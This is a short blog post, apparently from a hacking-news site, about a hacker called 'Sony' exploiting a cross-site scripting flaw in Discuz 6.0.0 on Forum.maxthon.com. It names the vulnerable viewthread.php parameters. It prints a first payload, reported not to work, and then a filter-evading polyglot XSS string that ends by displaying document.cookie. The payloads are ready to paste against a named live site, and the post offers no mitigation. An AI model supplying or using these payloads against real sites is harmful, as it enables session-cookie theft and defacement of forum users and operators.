Search This Blog

Powered by Blogger.

Blog Archive

Labels

Hacker exploit the XSS vulnerability in Discuz 6.0.0 to hack Forum.maxthon.com


Hacker named as "Sony" discovered the XSS vulnerability in Forum.maxthon.com website. Actually, the vulnerability is in the Discuz 6.0.0 forum software. It is one of the old vulnerability in Discuz6.0.0(discovered in 2010), the Viewthread file of the forum software is vulnerable to Cross site Scripting.

Ex:
viewthread.php?tid=">><script>alert(HACKED BY FATAL ERROR)</script><marquee><h1>XSS By Fatal
 Error</h1></marquee>

But The above code won't work. Now, Hacker "Sony" use some techniques to bypass the XSS Filtering and got success.

viewthread.php?action=printable&tid=[xss is here]

He insert the following code in the vulnerable link:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><script>alert(document.cookie)</script>

[source: st2tea]
Share it:

Vulnerability

Web Application Vulnerability

XSS Vulnerability